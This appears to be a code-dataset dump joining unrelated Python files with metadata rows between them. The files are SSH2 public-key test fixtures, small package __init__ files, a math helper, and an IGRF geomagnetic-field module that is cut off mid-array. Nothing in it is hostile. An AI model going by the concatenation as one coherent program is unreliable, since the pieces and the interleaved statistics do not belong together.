['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2028-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/g1KS2Amcx2dKUY/AaDl+S9Nl5T8fqinfhurFuom2G\nAzcq30DtqAK5FVHXCKiYH9l4v+GDe7fi5nYX7teajgThPLUUPd0KSUa2xFcMZqDVOzv5jn\nB9lFVPZiQmRh4uP0dycxwtdYYGsOjkbriKfpTD/nlqzNPtaGInFRzGRPsaHSr2qYI8IHug\nG/A3SDxaJiNsNH4dg2QKQK0q4OxIn+tsFuiVJCessDpoKS0C4NzZYxKvsc0+2Ke7Qk1yXF\nDCyDlAagNGkjQLldsVWavdffv9u71ZnWi1jqyMEmG0nbtHJLasaiS+JKppN3drgxD5eheu\nhewJjMDzC3iBRRmhin\n---- END SSH2 PUBLIC KEY ----\n',
2028,
'MD5:46:6d:20:95:d9:ba:4f:73:2b:dc:16:ae:c6:50:68:33',
None,
'valid_rsa_2028_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2031-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/mNcgBv75NCxkdwWznRWS9j4lBiE3kt+u/CmQl2UxE\nyDm6C5w42WCG6iHObmrOisUOC+FA7GqcanPw5FBPiXNGNFdPbFmOiHplkE6fe9LZeWSZWx\nseZKc0ShjQZ1MaUWDZeSlFoy1s71PO84eFFpn7yE6wt/KlhEoCIpdXai2wpJdTVp7gOQ4x\nYNRVYScWdj8nfAHM9mj7YM0AGymEI3nU4yDokAzktWDp/Y5u64+l0bTu4irA/NIP8ctBkD\nVZMwOyRbIcJkWYlGnJnyxR4JOefR8GhOH0z/YIE42KqJoHHL299JMFOT7HaBBm7YHFoq/K\ntKUZrSKlHTCLRfiA59\n---- END SSH2 PUBLIC KEY ----\n',
2031,
'MD5:6e:7c:f6:0b:e3:6e:2d:a7:e1:e9:4c:68:d3:89:ba:d6',
None,
'valid_rsa_2031_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2034-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/wPaxCp9EthdCMUBIZMPfmpk4UHQV5IENsAagu6krz\nafIWJNpH1tdZGLJ7KWCS9tzXYLuPux2ZbHkDpAc6zXPY722WtWZsV81t/+WPdQcxoY0/nC\nPR6CK6XUgzYyrZbZvwu2yx5u20aSLsrDYunKmkZkz11rjBSQPrL9SikanpaDHibzlpTPa/\nXvb8Mv9ty15dYWlP/Kwgo1VN+xXai2BchwQ/rGdhhc5nEotRxFByc9onkJJA3jQrtzKw6P\nYmkAYcX5yftPfUkcgC3qaFP4FR8zIcZICgoJKClaevimv6Om1lkAKaOJbYxkFtKciuufF2\nUw61t1FiAanbKc+5U0sw==\n---- END SSH2 PUBLIC KEY ----\n',
2034,
'MD5:dd:49:3c:ba:e5:dc:e2:f1:ef:ed:80:c5:0a:ed:7f:aa',
None,
'valid_rsa_2034_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2037-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAAA/xW3UoBjiOoneRlPJn2vCyg8iUJqTx5JSUJcrbpr5x\ncUXVUykVDMI7VnPqsQbX0PUwU47z2Qp7KBUfslSh6CkBOLZRxxHGf/EAj2Or86K4ZxJJx3\nT/Zrq7yzThAGOOKq+QzTBmsfQTCdgy4XDs0Axcpbohk6lIhscq86Lc4V2hL/JJUdlmt3Nx\nfeBuoq+7jD/HLV2VFRs62pBJQCePM/9m4rWPApbfdNlq7V03ncFx1hsVWMcmBrlLUxgW+k\nu8bt74kyZnNcWYflOkxMH8IsZH73xkpF5E5uHtnxClZ2rrzrBWDyHco7wGJNrG/cTKPOAS\nn3VoomdBAJ+ea24lGlkw==\n---- END SSH2 PUBLIC KEY ----\n',
2037,
'MD5:2f:71:47:7f:51:99:97:b7:00:74:76:43:35:a6:9e:5d',
None,
'valid_rsa_2037_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2040-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAABAAC8AOpsr/bye5kOvXynQanwbDwusCLkFA1B/UmYVp\nB4lGlp7p/RKcOZ9uiwsnPP0JQ7OrZ5O+oDIW2WdHPfjfzlGCyoMuL3+PwHzqB+L8A8/9hR\nXLJAulufUvi/vFRfxUc05q/BWwGE6RsIzadvpdm9XtdXoG9eElpn7J+k4WE+5V9rR2c7Tz\noOt5TP/4emAwcHAxQIaIygijdHISS3CYIAWmIM33U5HbEbQBRrAE6I6y0gQxvhHCEat0c5\nRJ/zSqXJpplAtE7n0DUqC9kmnJsDAB9Cq7hxiRrttrMvl1ERoK0XW3wWwqi6mvVv3HHOfV\nj1lxLEwpeLEHRTQdS5sy0=\n---- END SSH2 PUBLIC KEY ----\n',
2040,
'MD5:99:6b:1d:c1:2b:d3:83:63:4e:a1:ea:51:c6:4e:25:17',
None,
'valid_rsa_2040_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2043-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAABAAXo4IUS1bJYWrydi8B+t68xzH97cpUcKEWgWqQvy6\nebRw/Y/G5kHVOHD9vGBLX2j4dseB+71meNxeaTkQCDPmck4FFFe8LlfJgcJupAwVnEu/YS\nne55MHa9fO1hiZsg/oiZabS/DKoyOHLE7Usa/JQXJzGaRtLWAP1vWuCigfX/yfLA+CXxA6\nFh6VVaEhlUAdOoVZ/aFBrwsG19Yp5sU23HSIHAmkFMApb5jvlQbjQrLzQr9qmiRgsylFPi\n5OHp2tvbQeRKA9XzKVjpof4tSd0JDq5XgUHtlRI9CsIrVxjUJS8WkdDWW/uNWFQhQ5CS33\n2Jvet9xP6ZZpsYxS5KpQU=\n---- END SSH2 PUBLIC KEY ----\n',
2043,
'MD5:af:82:da:e7:04:5d:a0:38:30:b4:5f:ae:e2:87:63:f2',
None,
'valid_rsa_2043_rfc4716', ["strict", "loose"]],
['---- BEGIN SSH2 PUBLIC KEY ----\nComment: "2046-bit RSA, converted by ojarva from Ope"\nAAAAB3NzaC1yc2EAAAADAQABAAABADR9kolU4uiD26LMrbakQlNf4QWB2xrdY3nASf6CJd\nQYzTMjNmbt6sJ4A4pGnCupFrzL04EYDvbVmT4GEZm6CU4BsY61yosnpGSqqcVCdw5xW1k4\nbCSDPW75WHLCVmYyROhZ+yyo8uAcIy5UIyBZXF/PO7taJrrIi5RwdqIPwtCrJ3dJkcFWa3\nqZWJykLAFQD5A/lta/egS/u/nyCap2e16WGnvSluz9CyYtGFNS9axzOwHxLFEv2ocOsJjY\ngzV+Jfpiao94A4VzLKbUDHlfV57KS0tJaT8FKKsg34vN3bsD0zUftLUPpUFgJfMwje0C2r\nCJkCzwgya2vxLqj2fg0Q0=\n---- END SSH2 PUBLIC KEY ----\n',
2046,
'MD5:27:24:34:50:5b:39:2d:34:f9:60:d5:4e:7a:c7:11:51',
None,
'valid_rsa_2046_rfc4716', ["strict", "loose"]]
]
| 133.635468 | 2,971 | 0.81226 | 2,465 | 27,128 | 8.890467 | 0.398377 | 0.036505 | 0.047456 | 0.032854 | 0.177413 | 0.177413 | 0.146201 | 0.087018 | 0.005476 | 0.005476 | 0 | 0.152528 | 0.070518 | 27,128 | 202 | 2,972 | 134.29703 | 0.716597 | 0 | 0 | 0.207921 | 0 | 0.39604 | 0.913116 | 0.737541 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
11379aaed54e86f8be1a0e15498bb9d6d644743f | 41 | py | Python | src/component/__init__.py | KennFatt/Transact | 0c62bb5dbfa4e062662cd0216613522bed26d71e | [
"MIT"
] | null | null | null | src/component/__init__.py | KennFatt/Transact | 0c62bb5dbfa4e062662cd0216613522bed26d71e | [
"MIT"
] | null | null | null | src/component/__init__.py | KennFatt/Transact | 0c62bb5dbfa4e062662cd0216613522bed26d71e | [
"MIT"
] | null | null | null | from .hoveredbutton import HoveredButton
| 20.5 | 40 | 0.878049 | 4 | 41 | 9 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
114700cef79a4c8eaf9b1fd6a1d28244e3b36553 | 290 | py | Python | src/zeep/xsd/__init__.py | ellethee/python-zeep | 356e12ba809e6b0cb476c6e5543a3e7353342e9c | [
"MIT"
] | 3 | 2018-11-26T16:17:03.000Z | 2021-09-27T12:36:51.000Z | src/zeep/xsd/__init__.py | ellethee/python-zeep | 356e12ba809e6b0cb476c6e5543a3e7353342e9c | [
"MIT"
] | null | null | null | src/zeep/xsd/__init__.py | ellethee/python-zeep | 356e12ba809e6b0cb476c6e5543a3e7353342e9c | [
"MIT"
] | 3 | 2018-11-26T16:17:07.000Z | 2022-02-25T06:38:06.000Z | """
zeep.xsd
--------
"""
from zeep.xsd.const import SkipValue # noqa
from zeep.xsd.elements import * # noqa
from zeep.xsd.schema import Schema # noqa
from zeep.xsd.types import * # noqa
from zeep.xsd.types.builtins import * # noqa
from zeep.xsd.valueobjects import * # noqa
| 24.166667 | 45 | 0.67931 | 41 | 290 | 4.804878 | 0.292683 | 0.248731 | 0.335025 | 0.380711 | 0.446701 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.189655 | 290 | 11 | 46 | 26.363636 | 0.838298 | 0.165517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
115366ff06d9f85a04965edac8def31679a8292e | 91 | py | Python | weakvtg/math.py | lparolari/weakvtg | e5d5f738ff0d916da8b31e967aa21f01fb74a906 | [
"RSA-MD",
"Info-ZIP"
] | null | null | null | weakvtg/math.py | lparolari/weakvtg | e5d5f738ff0d916da8b31e967aa21f01fb74a906 | [
"RSA-MD",
"Info-ZIP"
] | null | null | null | weakvtg/math.py | lparolari/weakvtg | e5d5f738ff0d916da8b31e967aa21f01fb74a906 | [
"RSA-MD",
"Info-ZIP"
] | null | null | null | def get_max(xs):
return max(xs)
def get_argmax(xs):
return xs.index(get_max(xs))
| 13 | 32 | 0.659341 | 17 | 91 | 3.352941 | 0.411765 | 0.263158 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197802 | 91 | 6 | 33 | 15.166667 | 0.780822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
116368a59b2173d460c1c636e90ef434d303b1fa | 39,227 | py | Python | mkigrf.py | percyd/Python-for-Earth-Science-Students | 24a105599391acbe9dc8efcb04051973881f6c72 | [
"CC-BY-4.0"
] | 71 | 2017-12-18T08:48:48.000Z | 2022-02-23T22:08:57.000Z | mkigrf.py | percyd/Python-for-Earth-Science-Students | 24a105599391acbe9dc8efcb04051973881f6c72 | [
"CC-BY-4.0"
] | null | null | null | mkigrf.py | percyd/Python-for-Earth-Science-Students | 24a105599391acbe9dc8efcb04051973881f6c72 | [
"CC-BY-4.0"
] | 37 | 2017-12-18T22:05:04.000Z | 2021-11-29T03:59:10.000Z | import numpy as np
def doigrf(long,lat,date):
"""
Calculates the interpolated (<2015) or extrapolated (>2015) main field and
secular variation coefficients and passes them to the Malin and Barraclough
routine (function pmag.magsyn) to calculate the field from the coefficients.
Parameters:
-----------
lon : east longitude in degrees (0 to 360 or -180 to 180)
lat : latitude in degrees (-90 to 90)
date : Required date in years and decimals of a year (A.D.)
Return
-----------
x : north component of the magnetic field in nT
y : east component of the magnetic field in nT
z : downward component of the magnetic field in nT
f : total magnetic field in nT
By default, igrf12 coefficients are used between 1900 and 2020
from http://www.ngdc.noaa.gov/IAGA/vmod/igrf.html.
To check the results you can run the interactive program at the NGDC
www.ngdc.noaa.gov/geomag-web
"""
models,igrf12coeffs=get_igrf12()
model,alt = date-date%5,0
if date<2015:
gh=igrf12coeffs[models.index(model)]
sv=(igrf12coeffs[models.index(model+5)]-gh)/5.
else:
gh=igrf12coeffs[models.index(2015)]
sv=igrf12coeffs[models.index('2015.20')]
x,y,z,f=magsyn(gh,sv,model,date,1,alt,90.-lat,long%360)
return x,y,z,f
#
def get_igrf12():
"""
returns the available models (dates) and gauss coefficients (coeffs) for the desired field model.
These coefficients are the IGRF12 coefficients from the NOAA website.
"""
models= [1900, 1905, 1910, 1915, 1920, 1925, 1930, 1935, 1940, 1945, 1950, 1955, 1960, 1965, 1970, 1975, 1980, 1985, 1990, 1995, 2000, 2005, 2010, 2015, '2015.20']
coeffs=np.array([[-31543, -2298, 5922, -677, 2905, -1061, 924, 1121, 1022, -1469, -330, 1256, 3, 572, 523, 876, 628, 195, 660, -69, -361, -210, 134, -75, -184, 328, -210, 264, 53, 5, -33, -86, -124, -16, 3, 63, 61, -9, -11, 83, -217, 2, -58, -35, 59, 36, -90, -69, 70, -55, -45, 0, -13, 34, -10, -41, -1, -21, 28, 18, -12, 6, -22, 11, 8, 8, -4, -14, -9, 7, 1, -13, 2, 5, -9, 16, 5, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, -1, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 2, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31464, -2298, 5909, -728, 2928, -1086, 1041, 1065, 1037, -1494, -357, 1239, 34, 635, 480, 880, 643, 203, 653, -77, -380, -201, 146, -65, -192, 328, -193, 259, 56, -1, -32, -93, -125, -26, 11, 62, 60, -7, -11, 86, -221, 4, -57, -32, 57, 32, -92, -67, 70, -54, -46, 0, -14, 33, -11, -41, 0, -20, 28, 18, -12, 6, -22, 11, 8, 8, -4, -15, -9, 7, 1, -13, 2, 5, -8, 16, 5, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 2, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31354, -2297, 5898, -769, 2948, -1128, 1176, 1000, 1058, -1524, -389, 1223, 62, 705, 425, 884, 660, 211, 644, -90, -400, -189, 160, -55, -201, 327, -172, 253, 57, -9, -33, -102, -126, -38, 21, 62, 58, -5, -11, 89, -224, 5, -54, -29, 54, 28, -95, -65, 71, -54, -47, 1, -14, 32, -12, -40, 1, -19, 28, 18, -13, 6, -22, 11, 8, 8, -4, -15, -9, 6, 1, -13, 2, 5, -8, 16, 5, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 2, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31212, -2306, 5875, -802, 2956, -1191, 1309, 917, 1084, -1559, -421, 1212, 84, 778, 360, 887, 678, 218, 631, -109, -416, -173, 178, -51, -211, 327, -148, 245, 58, -16, -34, -111, -126, -51, 32, 61, 57, -2, -10, 93, -228, 8, -51, -26, 49, 23, -98, -62, 72, -54, -48, 2, -14, 31, -12, -38, 2, -18, 28, 19, -15, 6, -22, 11, 8, 8, -4, -15, -9, 6, 2, -13, 3, 5, -8, 16, 6, -5, 8, -18, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 8, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-31060, -2317, 5845, -839, 2959, -1259, 1407, 823, 1111, -1600, -445, 1205, 103, 839, 293, 889, 695, 220, 616, -134, -424, -153, 199, -57, -221, 326, -122, 236, 58, -23, -38, -119, -125, -62, 43, 61, 55, 0, -10, 96, -233, 11, -46, -22, 44, 18, -101, -57, 73, -54, -49, 2, -14, 29, -13, -37, 4, -16, 28, 19, -16, 6, -22, 11, 7, 8, -3, -15, -9, 6, 2, -14, 4, 5, -7, 17, 6, -5, 8, -19, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 9, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30926, -2318, 5817, -893, 2969, -1334, 1471, 728, 1140, -1645, -462, 1202, 119, 881, 229, 891, 711, 216, 601, -163, -426, -130, 217, -70, -230, 326, -96, 226, 58, -28, -44, -125, -122, -69, 51, 61, 54, 3, -9, 99, -238, 14, -40, -18, 39, 13, -103, -52, 73, -54, -50, 3, -14, 27, -14, -35, 5, -14, 29, 19, -17, 6, -21, 11, 7, 8, -3, -15, -9, 6, 2, -14, 4, 5, -7, 17, 7, -5, 8, -19, 8, 10, -20, 1, 14, -11, 5, 12, -3, 1, -2, -2, 9, 2, 10, 0, -2, -1, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30805, -2316, 5808, -951, 2980, -1424, 1517, 644, 1172, -1692, -480, 1205, 133, 907, 166, 896, 727, 205, 584, -195, -422, -109, 234, -90, -237, 327, -72, 218, 60, -32, -53, -131, -118, -74, 58, 60, 53, 4, -9, 102, -242, 19, -32, -16, 32, 8, -104, -46, 74, -54, -51, 4, -15, 25, -14, -34, 6, -12, 29, 18, -18, 6, -20, 11, 7, 8, -3, -15, -9, 5, 2, -14, 5, 5, -6, 18, 8, -5, 8, -19, 8, 10, -20, 1, 14, -12, 5, 12, -3, 1, -2, -2, 9, 3, 10, 0, -2, -2, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -2, 1, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30715, -2306, 5812, -1018, 2984, -1520, 1550, 586, 1206, -1740, -494, 1215, 146, 918, 101, 903, 744, 188, 565, -226, -415, -90, 249, -114, -241, 329, -51, 211, 64, -33, -64, -136, -115, -76, 64, 59, 53, 4, -8, 104, -246, 25, -25, -15, 25, 4, -106, -40, 74, -53, -52, 4, -17, 23, -14, -33, 7, -11, 29, 18, -19, 6, -19, 11, 7, 8, -3, -15, -9, 5, 1, -15, 6, 5, -6, 18, 8, -5, 7, -19, 8, 10, -20, 1, 15, -12, 5, 11, -3, 1, -3, -2, 9, 3, 11, 0, -2, -2, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30654, -2292, 5821, -1106, 2981, -1614, 1566, 528, 1240, -1790, -499, 1232, 163, 916, 43, 914, 762, 169, 550, -252, -405, -72, 265, -141, -241, 334, -33, 208, 71, -33, -75, -141, -113, -76, 69, 57, 54, 4, -7, 105, -249, 33, -18, -15, 18, 0, -107, -33, 74, -53, -52, 4, -18, 20, -14, -31, 7, -9, 29, 17, -20, 5, -19, 11, 7, 8, -3, -14, -10, 5, 1, -15, 6, 5, -5, 19, 9, -5, 7, -19, 8, 10, -21, 1, 15, -12, 5, 11, -3, 1, -3, -2, 9, 3, 11, 1, -2, -2, 2, -3, -4, 2, 2, 1, -5, 2, -2, 6, 6, -4, 4, 0, 0, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30594, -2285, 5810, -1244, 2990, -1702, 1578, 477, 1282, -1834, -499, 1255, 186, 913, -11, 944, 776, 144, 544, -276, -421, -55, 304, -178, -253, 346, -12, 194, 95, -20, -67, -142, -119, -82, 82, 59, 57, 6, 6, 100, -246, 16, -25, -9, 21, -16, -104, -39, 70, -40, -45, 0, -18, 0, 2, -29, 6, -10, 28, 15, -17, 29, -22, 13, 7, 12, -8, -21, -5, -12, 9, -7, 7, 2, -10, 18, 7, 3, 2, -11, 5, -21, -27, 1, 17, -11, 29, 3, -9, 16, 4, -3, 9, -4, 6, -3, 1, -4, 8, -3, 11, 5, 1, 1, 2, -20, -5, -1, -1, -6, 8, 6, -1, -4, -3, -2, 5, 0, -2, -2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30554, -2250, 5815, -1341, 2998, -1810, 1576, 381, 1297, -1889, -476, 1274, 206, 896, -46, 954, 792, 136, 528, -278, -408, -37, 303, -210, -240, 349, 3, 211, 103, -20, -87, -147, -122, -76, 80, 54, 57, -1, 4, 99, -247, 33, -16, -12, 12, -12, -105, -30, 65, -55, -35, 2, -17, 1, 0, -40, 10, -7, 36, 5, -18, 19, -16, 22, 15, 5, -4, -22, -1, 0, 11, -21, 15, -8, -13, 17, 5, -4, -1, -17, 3, -7, -24, -1, 19, -25, 12, 10, 2, 5, 2, -5, 8, -2, 8, 3, -11, 8, -7, -8, 4, 13, -1, -2, 13, -10, -4, 2, 4, -3, 12, 6, 3, -3, 2, 6, 10, 11, 3, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30500, -2215, 5820, -1440, 3003, -1898, 1581, 291, 1302, -1944, -462, 1288, 216, 882, -83, 958, 796, 133, 510, -274, -397, -23, 290, -230, -229, 360, 15, 230, 110, -23, -98, -152, -121, -69, 78, 47, 57, -9, 3, 96, -247, 48, -8, -16, 7, -12, -107, -24, 65, -56, -50, 2, -24, 10, -4, -32, 8, -11, 28, 9, -20, 18, -18, 11, 9, 10, -6, -15, -14, 5, 6, -23, 10, 3, -7, 23, 6, -4, 9, -13, 4, 9, -11, -4, 12, -5, 7, 2, 6, 4, -2, 1, 10, 2, 7, 2, -6, 5, 5, -3, -5, -4, -1, 0, 2, -8, -3, -2, 7, -4, 4, 1, -2, -3, 6, 7, -2, -1, 0, -3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30421, -2169, 5791, -1555, 3002, -1967, 1590, 206, 1302, -1992, -414, 1289, 224, 878, -130, 957, 800, 135, 504, -278, -394, 3, 269, -255, -222, 362, 16, 242, 125, -26, -117, -156, -114, -63, 81, 46, 58, -10, 1, 99, -237, 60, -1, -20, -2, -11, -113, -17, 67, -56, -55, 5, -28, 15, -6, -32, 7, -7, 23, 17, -18, 8, -17, 15, 6, 11, -4, -14, -11, 7, 2, -18, 10, 4, -5, 23, 10, 1, 8, -20, 4, 6, -18, 0, 12, -9, 2, 1, 0, 4, -3, -1, 9, -2, 8, 3, 0, -1, 5, 1, -3, 4, 4, 1, 0, 0, -1, 2, 4, -5, 6, 1, 1, -1, -1, 6, 2, 0, 0, -7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30334, -2119, 5776, 